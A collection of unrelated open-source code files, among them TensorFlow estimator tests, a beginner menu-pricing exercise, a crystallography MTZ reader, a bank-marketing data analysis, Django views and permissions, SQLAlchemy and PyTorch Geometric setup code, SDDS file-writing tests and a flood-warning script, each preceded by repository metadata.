return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_predict_only(features):
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
# TODO(kathywu): Re-enable test after def_function changes are built into
# nightlies.
@test_util.run_all_in_graph_and_eager_modes
class ModelFunctionTest(object):
def test_from_function(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(15, self.evaluate(out['predictions']))
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = mfn.predict(constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def test_model_fn_train_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_train_only, ModeKeys.TRAIN)
out = mfn.train(constant_op.constant(4), constant_op.constant(6))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(24, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_model_fn_predict_only(self):
mfn = function.ModelFunction()
mfn.add_mode(_model_fn_predict_only, ModeKeys.PREDICT)
out = mfn.predict(constant_op.constant(4))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.assertEqual(5, self.evaluate(out['predictions']))
with self.assertRaisesRegexp(ValueError, 'not defined'):
out = mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
def test_save_and_load(self):
mfn = function.ModelFunction.from_function(_model_fn)
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(variables.variables_initializer(mfn.variables.values()))
self.evaluate(out['predictions'])
for _ in range(2):
out = mfn.train(constant_op.constant(3), constant_op.constant(5))
self.evaluate(out['predictions'])
self.assertEqual(
3, self.evaluate(mfn._variable_holder.variables['global_step']))
mfn.evaluate(constant_op.constant(7), constant_op.constant(9))
mfn.predict(constant_op.constant(10))
save_dir = os.path.join(self.get_temp_dir(), 'model_function')
save.save(mfn, save_dir)
obj = load.load(save_dir)
variables_by_name = obj._variables_by_name
self.evaluate(variables.variables_initializer(
variables_by_name._unconditional_dependency_names.values()))
self.assertEqual(3, self.evaluate(variables_by_name.global_step))
out = obj._functions['train'](constant_op.constant(3),
constant_op.constant(5))
self.assertEqual(15, self.evaluate(out['predictions']))
self.assertEqual(4, self.evaluate(variables_by_name.global_step))
out = obj._functions['eval'](constant_op.constant(7),
constant_op.constant(9))
self.assertEqual(16, self.evaluate(out['predictions']))
out = obj._functions['infer'](constant_op.constant(10))
self.assertEqual(11, self.evaluate(out['predictions']))
def _model_fn_callable_variable_initializers(features, labels, mode):
"""Model_fn with callable variable initializers (for WrappedGraph tests)."""
_ = features, labels
v = variables.Variable(lambda: constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
@test_util.run_all_in_graph_and_eager_modes
class EstimatorWrappedGraphTest(test.TestCase):
def test_wrap_model_fn_train(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(3)
labels = constant_op.constant(4)
mode = ModeKeys.TRAIN
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.evaluate(variables.variables_initializer(graph.variables.values()))
self.assertEqual(0, self.evaluate(graph.global_step))
self.assertEqual(12, self.evaluate(fn(features, labels)['predictions']))
self.assertEqual(1, self.evaluate(graph.global_step))
self.assertEqual('AssignAddVariableOp',
graph.estimator_spec.train_op.type)
def test_wrap_model_fn_eval(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(5)
labels = constant_op.constant(6)
mode = ModeKeys.EVAL
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, labels, mode], kwargs={})
self.assertDictEqual({'predictions': 11},
self.evaluate(fn(features, labels)))
def test_wrap_model_fn_predict(self):
graph = function._EstimatorWrappedGraph()
features = constant_op.constant(7)
mode = ModeKeys.PREDICT
fn = graph.wrap_model_fn(
_model_fn_callable_variable_initializers,
mode=mode, args=[features, None, mode], kwargs={})
self.assertDictEqual({'predictions': 8},
self.evaluate(fn(features)))
def test_wrap_input_receiver_fn(self):
def serving_input_fn():
receiver_1 = array_ops.placeholder(dtypes.string)
receiver_2 = array_ops.placeholder(dtypes.string)
receiver_tensors = {
'rec1': receiver_1,
u'rec2': receiver_2,
}
concat = string_ops.string_join([receiver_1, receiver_2])
concat2 = array_ops.identity(concat)
features = {
'feature0': string_ops.string_join([concat, concat2], ':'),
u'feature1': constant_op.constant([1])
}
alternate_tensors = {
'alt_name_1': concat,
'alt_name_2': {
'tensor1': concat,
'tensor2': concat2}
}
return export_lib.ServingInputReceiver(
features, receiver_tensors, alternate_tensors)
graph = function._EstimatorWrappedGraph()
fns = graph.wrap_input_receiver_fn(serving_input_fn)
for fn, name in fns:
if name is None:
out = fn(constant_op.constant('1'), constant_op.constant('2'))
self.assertDictEqual(
_string_fix({'feature0': '12:12', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_1':
out = fn(constant_op.constant('3'))
self.assertDictEqual(
_string_fix({'feature0': '3:3', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
elif name == 'alt_name_2':
out = fn(constant_op.constant('4'), constant_op.constant('5'))
self.assertDictEqual(
_string_fix({'feature0': '4:5', 'feature1': [1]}),
_string_fix(self.evaluate(out)))
if __name__ == '__main__':
test.main()
| 1.625
| 2
|
1_beginner/chapter4/solutions/menu.py
|
code4tomorrow/Python
| 4
|
12778036
|
"""
A restaurant menu has food and drink sections,
and the customer must choose one order from each.
By default, any combination of food and drink orders
costs $1,000,000,000.
But if the customer enters 'french toast'
AND 'coffee', there is a discount of $1.
Otherwise, if the customer enters 'chicken soup' OR 'apple juice',
the price increases by $1.
Write a program that takes an order from a user
and prints out the appropriate price.
Assume that all inputs are in lowercase
and that it is always food first, and then drink.
"""
# all orders are $1 billion by default
total_cost = 1_000_000_000 # underscores to increase readability
# take the user's order
food = input("What food would you like? ")
drink = input("What drink would you like? ")
# discount of $1 if the user orders french toast and coffee
if food == "french toast" and drink == "coffee":
total_cost -= 1
# charge extra $1 if user orders chicken soup or apple juice
elif food == "chicken soup" or drink == "apple juice":
total_cost += 1
# display total
print("Total cost: $" + str(total_cost))
| 4.25
| 4
|
src/xia2/Modules/Mtzdump.py
|
graeme-winter/xia2
| 10
|
12778037
|
<reponame>graeme-winter/xia2
# A replacement for the wrapper for the CCP4 program MTZDUMP using CCTBX
# to access the file directly.
import copy
import os
from iotbx import mtz
class Mtzdump:
"""A class to give the same functionality as the wrapper for the CCP4
MTZDUMP program."""
def __init__(self):
self._header = {"datasets": [], "dataset_info": {}}
self._batch_header = {}
self._batches = None
self._reflections = 0
self._resolution_range = (0, 0)
def set_working_directory(self, wd):
pass
def get_working_directory(self):
return None
def set_hklin(self, hklin):
self._hklin = hklin
def dump(self):
"""Actually obtain the contents of the mtz file header."""
assert self._hklin, self._hklin
assert os.path.exists(self._hklin), self._hklin
mtz_obj = mtz.object(self._hklin)
        # work through the file accumulating the necessary information
self._header["datasets"] = []
self._header["dataset_info"] = {}
self._batches = [batch.num() for batch in mtz_obj.batches()]
self._header["column_labels"] = [column.label() for column in mtz_obj.columns()]
self._header["column_types"] = [column.type() for column in mtz_obj.columns()]
self._resolution_range = mtz_obj.max_min_resolution()
self._header["spacegroup"] = mtz_obj.space_group_name()
self._reflections = mtz_obj.n_reflections()
for crystal in mtz_obj.crystals():
if crystal.name() == "HKL_base":
continue
pname = crystal.project_name()
xname = crystal.name()
cell = crystal.unit_cell().parameters()
for dataset in crystal.datasets():
dname = dataset.name()
wavelength = dataset.wavelength()
dataset_id = f"{pname}/{xname}/{dname}"
dataset_number = dataset.i_dataset()
assert dataset_id not in self._header["datasets"]
self._header["datasets"].append(dataset_id)
self._header["dataset_info"][dataset_id] = {}
self._header["dataset_info"][dataset_id]["wavelength"] = wavelength
self._header["dataset_info"][dataset_id]["cell"] = cell
self._header["dataset_info"][dataset_id]["id"] = dataset_number
def get_columns(self):
"""Get a list of the columns and their types as tuples
(label, type) in a list."""
return [
(cl, self._header["column_types"][i])
for i, cl in enumerate(self._header["column_labels"])
]
def get_resolution_range(self):
return self._resolution_range
def get_datasets(self):
"""Return a list of available datasets."""
return self._header["datasets"]
def get_dataset_info(self, dataset):
"""Get the cell, spacegroup & wavelength associated with
a dataset. The dataset is specified by pname/xname/dname."""
result = copy.deepcopy(self._header["dataset_info"][dataset])
result["spacegroup"] = self._header["spacegroup"]
return result
def get_spacegroup(self):
"""Get the spacegroup recorded for this reflection file."""
return self._header["spacegroup"]
def get_batches(self):
"""Get a list of batches found in this reflection file."""
return self._batches
def get_reflections(self):
"""Return the number of reflections found in the reflection
file."""
return self._reflections
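if __name__ == "__main__":
    # Minimal usage sketch: run this module directly with the path to an MTZ
    # file to print a quick summary. Reading the path from the command line
    # here is purely illustrative and not part of how xia2 uses this class.
    import sys

    md = Mtzdump()
    md.set_hklin(sys.argv[1])
    md.dump()
    print("Spacegroup:", md.get_spacegroup())
    print("Resolution range:", md.get_resolution_range())
    print("Reflections:", md.get_reflections())
    print("Columns:", md.get_columns())
    for dataset in md.get_datasets():
        print(dataset, md.get_dataset_info(dataset))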
| 2.453125
| 2
|
Chapter12/old_12/BankSubscriberEDA.py
|
amirziai/Hands-on-Artificial-Intelligence-with-TensorFlow-Book
| 10
|
12778038
|
'''
Created on 10-Jul-2018
@author: <NAME>
'''
# We will use seaborn to create plots
import seaborn as sns
# Matplotlib will help us to draw the plots
import matplotlib.pyplot as plt
sns.set(color_codes=True)
# Import pandas to manage data set
import pandas as pd
# Import NumPy for all mathematics operations on numerical data
import numpy as np
# Let's load the pre-processed version of data set
file_name = 'bank_data_test.csv'
# Load into a variable using pandas read_csv
data = pd.read_csv(file_name, delimiter=',')
# Let's verify the size of data set
print('Number of Instances: %d\nNumber of attributes: %d'%(data.shape[0],data.shape[1]))
'''
Number of Instances: 41188
Number of attributes: 21
'''
# Let's see a brief summary of some variables
print(data.describe()[['age','duration','campaign','pdays']])
'''
age duration campaign pdays
count 41188.00000 41188.000000 41188.000000 41188.000000
mean 40.02406 258.285010 2.567593 962.475454
std 10.42125 259.279249 2.770014 186.910907
min 17.00000 0.000000 1.000000 0.000000
25% 32.00000 102.000000 1.000000 999.000000
50% 38.00000 180.000000 2.000000 999.000000
75% 47.00000 319.000000 3.000000 999.000000
max 98.00000 4918.000000 56.000000 999.000000
'''
# Let's extract the output variable using its column name
y = data.y
# We will shuffle the data set before visualization
data = data.reindex(np.random.permutation(data.index))
# Here we will plot it, and count instances for different class
ax = sns.countplot(y,label="Count")
No, Yes= y.value_counts()
print('Number of to be subscriber: ',Yes)
print('Number of not to be subscriber : ',No)
'''
Number of to be subscriber: 4640
Number of not to be subscriber : 36548
'''
# Here show the created plots
plt.show()
# We will create 4 distribution plots
f, axes = plt.subplots(nrows=2,ncols=2, figsize=(15, 6))
# Monthly marketing activity
sns.distplot(data['month_integer'], kde=False, color="#ff3300", ax=axes[0][0]).set_title('Months of Marketing Activity Distribution')
axes[0][0].set_ylabel('Potential Clients Count')
axes[0][0].set_xlabel('Months')
# Potential subscriber on Age basis
sns.distplot(data['age'], kde=False, color="#3366ff", ax=axes[0][1]).set_title('Age of Potential Clients Distribution')
axes[0][1].set_ylabel('Potential Clients Count')
axes[0][1].set_xlabel('Age')
# Calls received during the marketing campaign
sns.distplot(data['campaign'], kde=False, color="#546E7A", ax=axes[1][0]).set_title('Calls Received in the Marketing Campaign')
axes[1][0].set_ylabel('Potential Clients Count')
axes[1][0].set_xlabel('Campaign')
# Jobs
sns.distplot(data['job'], kde=False, color="#33ff66", ax=axes[1][1]).set_title('Potential clients on Job basis')
axes[1][1].set_ylabel('Potential Clients Count')
axes[1][1].set_xlabel('Job Type')
#Show all created plots
plt.show()
# We will first remove output variable from data
x = data
# Store output variable
y = data.y
# Now let's plot correlation between all the features
# Define figure size
f,ax = plt.subplots(figsize=(15, 15))
# Create correlation plot using seaborn
sns.heatmap(x.corr(), annot=True, linewidths=.5, fmt= '.1f',ax=ax)
corr = x.corr()
# plot the correlations
plt.show()
# We will drop highly correlated features
drop_list = ['emp.var.rate','nr.employed','cons.price.idx','euribor3m','previous']
#Let's remove the redundant features
data = x.drop(drop_list,axis = 1)
print(data.columns)
'''
Index(['age', 'duration', 'campaign', 'pdays', 'cons.conf.idx', 'job',
'marital', 'education', 'default', 'housing', 'loan', 'contact',
'day_of_week', 'poutcome', 'y', 'month_integer'],
dtype='object')
'''
data.to_csv('bank_data_feat_select_test.csv')
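# As a sketch of how the drop list above could be derived programmatically
# rather than hard-coded: flag one column from every pair whose absolute
# correlation exceeds a threshold. The 0.9 cutoff is only an illustrative
# assumption, not a value used in the original analysis.
corr_abs = corr.abs()
upper = corr_abs.where(np.triu(np.ones(corr_abs.shape, dtype=bool), k=1))
flagged = [col for col in upper.columns if (upper[col] > 0.9).any()]
print('Columns flagged as highly correlated:', flagged)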
| 3.71875
| 4
|
pdsensorvis/sensors/migrations/0004_auto_20190925_0809.py
|
mickeykkim/masters-project-sphere
| 2
|
12778039
|
# Generated by Django 2.2.2 on 2019-09-25 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sensors', '0003_auto_20190924_2227'),
]
operations = [
migrations.AlterField(
model_name='cameradata',
name='filename',
field=models.FileField(help_text='Camera video file', upload_to='camera/'),
),
migrations.AlterField(
model_name='cameradata',
name='framerate',
field=models.CharField(choices=[('NTSC_Film', 23.98), ('Film', 24), ('PAL', 25), ('NTSC', 29.97), ('Web', 30), ('PAL_HD', 50), ('NTSC_HD', 59.94), ('High', 60)], default='Film', help_text='Video framerate', max_length=9),
),
migrations.AlterField(
model_name='wearabledata',
name='filename',
field=models.FileField(help_text='Wearable data file', upload_to='wearable/'),
),
]
| 1.84375
| 2
|
helpingnetwork/organization/views.py
|
neopentane/Techathon_19
| 0
|
12778040
|
from django.shortcuts import render,redirect
from .forms import OrganizationRegisterForm,CreateEventForm,AddImageForm,AddOrgImage
from .models import Organization,OrganizationImages
from django.contrib.auth.models import User
from django.contrib import messages
from evelist.models import Event,EventImages
from volunteer.models import City,Volunteer
from django.db.models import F
# Create your views here.
def signup(request):
if request.method == 'POST':
form = OrganizationRegisterForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
o_name = form.cleaned_data.get('name')
o_vision= form.cleaned_data.get('vision')
o_mission= form.cleaned_data.get('mission')
o_link=form.cleaned_data.get('link')
t_user=User.objects.filter(username=username).first()
p=Organization(user=t_user,name=o_name,vision=o_vision,mission=o_mission,link=o_link)
p.save()
messages.success(request, f'Account created for {username}!')
return redirect('register')
else:
form = OrganizationRegisterForm()
return render(request, 'organization/signup.html', {'form': form})
def cenv(request):
if request.method == 'POST':
form1=CreateEventForm(request.POST,request.FILES)
if form1.is_valid():
new_event=form1.save(commit=False)
new_event.organizer=request.user.organization
new_event.save()
return redirect('add_img')
else:
form1=CreateEventForm()
return render(request, 'organization/cenv.html',{'form': form1})
def aenv(request):
c_organization=request.user.organization
allevents=Event.objects.filter(organizer=c_organization)
context={
"events":allevents
}
return render(request, 'organization/aenv.html',context)
def changep(request):
if request.method == 'POST':
form2=AddOrgImage(request.POST,request.FILES)
if form2.is_valid():
new_org=form2.save(commit=False)
new_org.organization=request.user.organization
new_org.save()
return redirect('change_profile')
else:
form2=AddOrgImage()
return render(request, 'organization/changep.html',{'form': form2})
def a_image(request):
if request.method == 'POST':
form2=AddImageForm(request.POST,request.FILES)
if form2.is_valid():
form2.save()
return redirect('add_img')
else:
form2=AddImageForm()
return render(request, 'organization/a_image.html',{'form': form2})
def printo(request):
if request.method == 'GET':
o_org=request.GET.get('org')
org=Organization.objects.filter(name=o_org).first()
images=OrganizationImages.objects.filter(organization=org)
context={
"name":org.name,
"vision":org.vision,
"mission":org.mission,
"link":org.link,
"img":images,
}
return render(request, 'organization/orgview.html',context)
def v_name(request):
if request.method == 'GET':
event=request.GET.get('event')
x=Event.objects.get(name=event).volunteers.all()
context={
'volunname':x,
}
return render(request,'organization/vname.html',context)
def upvote(request):
if request.method == 'GET':
volun=request.GET.get('volunteer')
c_user=User.objects.filter(username=volun).first()
c_vol=Volunteer.objects.filter(user=c_user).update(upvote=F('upvote')+1)
messages.success(request, f'successfully upvoted for {c_user}!')
return redirect('all_event')
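# For orientation, a possible urls.py wiring for the views above. This is only
# a sketch: the URL names 'register', 'add_img', 'change_profile' and
# 'all_event' are taken from the redirects used in these views, while the
# paths and the remaining names are assumptions.
#
# from django.urls import path
# from . import views
#
# urlpatterns = [
#     path('signup/', views.signup, name='register'),
#     path('event/create/', views.cenv, name='create_event'),
#     path('event/all/', views.aenv, name='all_event'),
#     path('profile/image/', views.changep, name='change_profile'),
#     path('event/image/', views.a_image, name='add_img'),
#     path('view/', views.printo, name='org_view'),
#     path('volunteers/', views.v_name, name='volunteer_names'),
#     path('upvote/', views.upvote, name='upvote'),
# ]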
| 1.953125
| 2
|
mkt/comm/authorization.py
|
clouserw/zamboni
| 0
|
12778041
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.permissions import BasePermission
from rest_framework.exceptions import PermissionDenied
from mkt.comm.models import (CommunicationNote, CommunicationThread,
user_has_perm_note, user_has_perm_thread)
class ThreadPermission(BasePermission):
"""
Permission wrapper for checking if the authenticated user has the
permission to view the thread.
"""
def has_permission(self, request, view):
# Let `has_object_permission` handle the permissions when we retrieve
# an object.
if view.action == 'retrieve':
return True
if not request.user.is_authenticated():
raise PermissionDenied()
return True
def has_object_permission(self, request, view, obj):
"""
Make sure we give correct permissions to read/write the thread.
"""
if not request.user.is_authenticated() or obj.read_permission_public:
return obj.read_permission_public
return user_has_perm_thread(obj, request.user)
class NotePermission(ThreadPermission):
def has_permission(self, request, view):
thread_id = view.kwargs.get('thread_id')
if not thread_id and view.kwargs.get('note_id'):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
thread_id = note.thread_id
# We save the thread in the view object so we can use it later.
view.comm_thread = get_object_or_404(
CommunicationThread, id=thread_id)
return ThreadPermission.has_object_permission(
self, request, view, view.comm_thread)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
return user_has_perm_note(obj, request.user)
class AttachmentPermission(NotePermission):
def has_permission(self, request, view):
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
def has_object_permission(self, request, view, obj):
# Has thread obj-level permission AND note obj-level permission.
note = CommunicationNote.objects.get(id=view.kwargs['note_id'])
return NotePermission.has_object_permission(self, request, view, note)
class EmailCreationPermission(object):
"""Permit if client's IP address is allowed."""
def has_permission(self, request, view):
auth_token = request.META.get('HTTP_POSTFIX_AUTH_TOKEN')
if auth_token and auth_token not in settings.POSTFIX_AUTH_TOKEN:
return False
remote_ip = request.META.get('REMOTE_ADDR')
return remote_ip and (
remote_ip in settings.ALLOWED_CLIENTS_EMAIL_API)
| 2.1875
| 2
|
quiz_bot/db/base.py
|
livestreamx/quiz-bot
| 1
|
12778042
|
<reponame>livestreamx/quiz-bot
from typing import Type
import sqlalchemy as sa
import sqlalchemy.orm as so
from sqlalchemy import MetaData
from sqlalchemy.ext.declarative import as_declarative, declared_attr
metadata = MetaData()
@as_declarative(metadata=metadata)
class Base:
@declared_attr
def __tablename__(cls) -> str:
return cls.__name__.lower() # type: ignore
class PrimaryKeyMixin:
id = sa.Column(sa.Integer, primary_key=True)
created_at = sa.Column(sa.DateTime(timezone=True), nullable=True, server_default=sa.func.now())
def _get_query_cls(mapper: Type[Base], session: so.Session) -> so.Query:
if mapper:
m = mapper
if isinstance(m, tuple):
m = mapper[0]
if isinstance(m, so.Mapper):
m = m.entity
try:
return m.__query_cls__(mapper, session) # type: ignore
except AttributeError:
pass
return so.Query(mapper, session)
Session = so.sessionmaker(query_cls=_get_query_cls)
current_session = so.scoped_session(Session)
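if __name__ == "__main__":
    # Minimal usage sketch for the declarative base and scoped session above.
    # The Player model, its columns and the in-memory SQLite URL are
    # assumptions made purely for illustration.
    engine = sa.create_engine("sqlite:///:memory:")

    class Player(PrimaryKeyMixin, Base):
        name = sa.Column(sa.String, nullable=False)

    metadata.create_all(engine)
    current_session.configure(bind=engine)

    current_session.add(Player(name="alice"))
    current_session.commit()
    print(current_session.query(Player).count())  # -> 1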
| 2.140625
| 2
|
datasets/dataset.py
|
levtelyatnikov/graph_edge_generation
| 0
|
12778043
|
<filename>datasets/dataset.py
from logging import raiseExceptions
import sys
import numpy as np
import torch
import pandas as pd
import torch_cluster
from omegaconf.dictconfig import DictConfig
from sklearn.model_selection import train_test_split
from torch_geometric.data import Dataset, Data
from datasets.synthetic_graph_generator import GraphGenerator
from datasets.preprocess_dataset import upload_data
from sklearn.datasets import load_breast_cancer, load_digits, load_boston, load_iris, load_diabetes, load_wine
from ml_flow.ml_pipline import ml_flow
class CustomDataset(Dataset):
"""Dataset example"""
def __init__(self, split, cfg: DictConfig):
super().__init__(root='None', transform=None, pre_transform=None, pre_filter=None)
"""Initialize
cfg:
:data_dir: data directory
:transforms: TransformObject Class which is defined in the transformfactory.py file
:target_transforms: TransformLabel Class which is defined in the transformfactory.py file
:split: train/val split
:val_size: validation size
:seed: seed
"""
self.cfg = cfg
self.split = split
self.graph_size = cfg.graph_size
self.val_size = cfg.val_size
self.seed = cfg.data_seed
self.n_batches = cfg.n_batches
self.setup()
def setup(self):
# Upload data
self.features, self.labels = upload_data(self.cfg.dataset_name)
assert self.features.shape[0]>0 and self.labels.shape[0]>0
# Obtain train test split
self.features, self.labels = self.train_test_split()
print(f'{self.split} set shape', self.features.shape)
# Get edges_index if needed
self.edge_index = self.get_graph()
def get_graph(self,):
gg = GraphGenerator(self.features, self.labels, self.cfg)
return gg.process()
def train_test_split(self,):
# Split data
X_train, X_val, y_train, y_val = train_test_split(self.features, self.labels,
test_size=self.val_size,
random_state=self.seed)
self.f1_svm, self.acc_svm, self.f1_lin, self.acc_lin = ml_flow(X_train, X_val, y_train, y_val)
if self.split == "train":
features = X_train
labels = y_train
elif self.split == "val":
self.graph_size = 'None'
features = X_val
labels =y_val
else:
print("Specify dataset split correctly", file=sys.stderr)
self.idxs = np.arange(features.shape[0])
return features, labels
def get(self, idx):
"""Return image and label"""
if self.graph_size == "None":
idxs = self.idxs
else:
idxs = np.random.choice(self.idxs, size=self.graph_size)
features = self.features[idxs]
label = self.labels[idxs]
data = Data(x=features, y=label)
if self.cfg.precompute_graph != 'None':
data.edge_index = self.edge_index
return data
def len(self):
return self.n_batches
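# The configuration fields read by this dataset (in __init__/setup/get above)
# can be supplied with an OmegaConf DictConfig along these lines. The concrete
# values, including the dataset name, are assumptions for illustration only,
# and GraphGenerator/upload_data may require further fields.
#
# from omegaconf import OmegaConf
#
# cfg = OmegaConf.create({
#     "dataset_name": "iris",
#     "graph_size": 64,
#     "val_size": 0.2,
#     "data_seed": 0,
#     "n_batches": 10,
#     "precompute_graph": "None",
# })
# train_set = CustomDataset(split="train", cfg=cfg)
# batch = train_set.get(0)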
| 2.640625
| 3
|
tests/test_sdds_write.py
|
radiasoft/rsbeams
| 3
|
12778044
|
<gh_stars>1-10
import unittest
from rsbeams.rsdata.SDDS import writeSDDS, readSDDS
from subprocess import Popen, PIPE
import numpy as np
# Tests that use SDDS Tools Distribution
def read_file(filename, par=None, col=None):
call1 = Popen('sddscheck {}'.format(filename), shell=True, stdout=PIPE, stderr=PIPE)
check, err = call1.communicate()
if err:
return None, None, None
else:
check = check.decode('utf-8')
if par:
call2 = Popen('sdds2stream -par={} {}'.format(par, filename), shell=True, stdout=PIPE, stderr=PIPE)
par, err = call2.communicate()
if err:
return None, None, None
else:
par = par.decode('utf-8')
if col:
call2 = Popen('sdds2stream -col={} {}'.format(col, filename), shell=True, stdout=PIPE, stderr=PIPE)
col, err = call2.communicate()
if err:
return None, None, None
else:
col = col.decode('utf-8')
return check, par, col
class TestWriteBinary(unittest.TestCase):
def setUp(self):
test1 = writeSDDS('file1.sdds')
test1.create_parameter('par1', 2342.452, 'double')
test1.create_parameter('par2', 42, 'long')
test1.create_column('col1', np.array([1.23892e-3, 52452.2]).ravel(), 'double')
test1.create_column('col2', np.array([135.252, 52452.2e4]).ravel(), 'double', colUnits='m', colSymbol='&n',
colDescription="A test description")
test1.save_sdds('file1.sdds', 'binary')
self.status, self.par1, self.col1 = read_file('file1.sdds', par='par1', col='col1')
_, self.par2, self.col2 = read_file('file1.sdds', par='par2', col='col2')
def test_status_one(self):
self.assertEqual(self.status, 'ok\n')
def test_parameter_one(self):
        self.assertAlmostEqual(float(self.par1), 2342.452, delta=1e-8)
def test_parameter_two(self):
self.assertEqual(float(self.par2), 42)
class TestWriteAscii(unittest.TestCase):
def setUp(self):
test1 = writeSDDS('file1.sdds')
test1.create_parameter('par1', 2342.452, 'double')
test1.create_parameter('par2', 42, 'long')
test1.create_column('col1', np.array([1.23892e-3, 52452.2]).ravel(), 'double')
test1.create_column('col2', np.array([135.252, 52452.2e4]).ravel(), 'double', colUnits='m', colSymbol='&n',
colDescription="A test description")
test1.save_sdds('file1.sdds', 'ascii')
self.status, self.par1, self.col1 = read_file('file1.sdds', par='par1', col='col1')
_, self.par2, self.col2 = read_file('file1.sdds', par='par2', col='col2')
def test_status_one(self):
self.assertEqual(self.status, 'ok\n')
def test_parameter_one(self):
self.assertAlmostEqual(float(self.par1), 2342.452, delta=1e-8)
def test_parameter_two(self):
self.assertEqual(float(self.par2), 42)
# Test for binary string write out in columns
# class TestStringWriteBinary(unittest.TestCase):
#
# def setUp(self):
# test1 = writeSDDS('file1.sdds')
# test1.create_column('col1', [7, "Chicago".encode(), 8, "New York".encode()], 'string')
# test1.save_sdds('file1.sdds', 'binary')
#
# self.status, _, self.col1 = read_file('file1.sdds', col='col1')
#
# def test_status_one(self):
# self.assertEqual(self.status, 'ok\n')
if __name__ == '__main__':
unittest.main()
| 2.203125
| 2
|
Task2B.py
|
butanone/flooddefense
| 0
|
12778045
|
<filename>Task2B.py
from floodsystem import station
from floodsystem import flood
from floodsystem.stationdata import build_station_list
from floodsystem import stationdata
def run():
"""Requirements for Task 2B"""
stations = build_station_list()
stationdata.update_water_levels(stations)
stations_over_threshold = flood.stations_level_over_threshold(stations, 0.8)
for station in stations_over_threshold:
print(station[0].name, station[1])
if __name__ == "__main__":
print("*** Task 2B: CUED Part IA Flood Warning System ***")
run()
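# stations_level_over_threshold is provided by the floodsystem package; the
# sketch below only illustrates the underlying idea of a relative-level
# threshold and is not the package's actual implementation. The attribute
# names latest_level and typical_range are assumptions.
#
# def relative_level(latest_level, typical_range):
#     low, high = typical_range
#     if high <= low:
#         return None  # inconsistent typical range
#     return (latest_level - low) / (high - low)
#
# def over_threshold(stations, tol):
#     """Yield (station, relative level) pairs above the tolerance tol."""
#     for s in stations:
#         if s.latest_level is None or s.typical_range is None:
#             continue
#         rel = relative_level(s.latest_level, s.typical_range)
#         if rel is not None and rel > tol:
#             yield s, rel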
| 2.734375
| 3
|
marginTrading/tests/test_spam/test_github_api.py
|
sambiase/pycrypto
| 3
|
12778046
|
import pytest
from unittest.mock import Mock
from marginTrading import github_api
@pytest.fixture
def avatar_url(mocker):
resp_mock = Mock()
url = 'https://avatars.githubusercontent.com/u/78605825?v=4'
resp_mock.json.return_value = {'login': 'sambiase', 'id': 78605825, 'node_id': 'MDQ6VXNlcjc4NjA1ODI1',
'avatar_url': url}
get_mock = mocker.patch('marginTrading.github_api.requests.get')
get_mock.return_value = resp_mock
return url
def teste_buscar_avatar(avatar_url):
url = github_api.buscar_avatar('sambiase')
assert avatar_url == url
def teste_buscar_avatar_integracao():
url = github_api.buscar_avatar('sambiase')
assert 'https://avatars.githubusercontent.com/u/78605825?v=4' == url
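# For context, a compatible implementation of the function under test could
# look roughly like the sketch below. This is inferred from the mocked
# requests.get call and the 'avatar_url' field, not taken from the actual
# marginTrading.github_api source.
#
# import requests
#
# def buscar_avatar(usuario):
#     """Return the avatar URL of the given GitHub user."""
#     resp = requests.get(f'https://api.github.com/users/{usuario}')
#     return resp.json()['avatar_url']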
| 2.4375
| 2
|
visualization.py
|
karanrampal/template_project
| 0
|
12778047
|
<reponame>karanrampal/template_project<filename>visualization.py
#!/usr/bin/env python3
"""Visualize the model"""
import argparse
import logging
import os
import numpy as np
import torch
from torch.utils.tensorboard import SummaryWriter
import utils
from model.net import Net
import model.data_loader as d_l
def args_parser():
"""Parse commadn line arguments
"""
parser = argparse.ArgumentParser()
parser.add_argument('--data_dir',
default='../datasets/',
help="Directory containing the dataset")
parser.add_argument('--model_dir',
default='experiments/base_model',
help="Directory containing params.json")
parser.add_argument('--restore_file',
default='best',
help="name of the file in --model_dir containing weights to load")
return parser.parse_args()
def visualize(model, dataloader, params, writer, num_proj=100):
"""Evaluate the model visualize the results.
Args:
model: (torch.nn.Module) the neural network
dataloader: (DataLoader) a torch.utils.data.DataLoader object that fetches data
params: (Params) hyperparameters
writer: (SummaryWriter) Summary writer for tensorboard
num_proj: (int) Number of images to project
"""
# put model in evaluation mode
model.eval()
class_probs = []
